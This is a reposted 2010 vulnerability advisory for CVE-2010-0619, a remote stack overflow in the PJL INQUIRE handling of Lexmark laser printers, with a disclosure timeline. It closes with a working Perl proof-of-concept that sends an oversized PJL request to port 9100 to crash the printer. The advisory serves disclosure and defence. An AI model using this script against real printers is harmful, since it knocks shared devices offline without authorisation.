首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lexmark Multiple Laser printer Remote Stack Overflow
来源:http://www.protekresearchlab.com 作者:Provencher 发布时间:2010-03-26  

#####################################################################################

Application:   Lexmark Multiple Laser printer Remote Stack Overflow

Platforms:   Lexmark Multiple Laser printer     

Exploitation:   Remote Exploitable   

CVE Number:   CVE-2010-0619

Discover Date:   2010-01-06

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com   


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code


#####################################################################################

=================
1) Introduction
=================

Lexmark specializes in printers and printer accessories. Its current range of products includes color and monochrome laser printers and inkjet printers, both of which may include scanners (including all-in-one devices with faxing and copying capabilities and photo printers), and dot matrix printers. Lexmark was one of the first companies to release wifi inkjet printers and the very first to release printers with a web-enabled touchscreen, coming in early September of 2009. They also offer a wide variety of laser printers with software solutions for more professional printing environments.

(Wikipedia)
#####################################################################################

====================
2) Report Timeline
====================

2010-01-06  Vendor Contacted
2010-01-09  Vendor Response
2010-01-09  Vendor request a PoC
2010-01-10  PoC is sent to the vendor
2010-01-12  Vendor confirme they received PoC
2010-01-13  Vendor confirm the vulnerability
2010-03-22  Public release of this advisory


#####################################################################################

======================
3) Technical details
======================

Multiple Lexmark Laser Printers contain remote buffer overflow vulnerabilities in their PJL processing
functionality. These vulnerabilities could lead to remote code execution on the printer without authentication. Device freezes when a specialy PLJ request is sent to the daemon with an invalid argument on PJL INQUIRE command.

#####################################################################################

=====================
4) Product affected
=====================

The list is too long, you can found information on the Lexmark web site;

http://support.lexmark.com/alerts


#####################################################################################

=============
5) The Code
=============


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Buffer Overflow PoC
#
# This PoC will completly DoS the printer and all is services, Use it at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);


$sock or die "no socket :$!";
send($sock, "\033%-12345X\@PJL INQUIRE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);

 

close $sock;

 


#####################################################################################
(PRL-2010-01)
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAP GUI version 7.00 BExGlobal
·SAP MaxDB Malformed Handshake
·Cisco TFTP Server 1.1 DoS
·Bad "VML" Remote DoS on Safari
·eDisplay Personal FTP server 1
·Remote DoS on Safari for iPhon
·KenWard's Zipper v1.400 Buffer
·tPop3d 1.5.3 DoS
·Solaris Update manager and Sun
·Mini-stream RM-MP3 Converter V
·UltraISO CCD File Parsing Buff
·JITed egg-hunter stage-0 shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved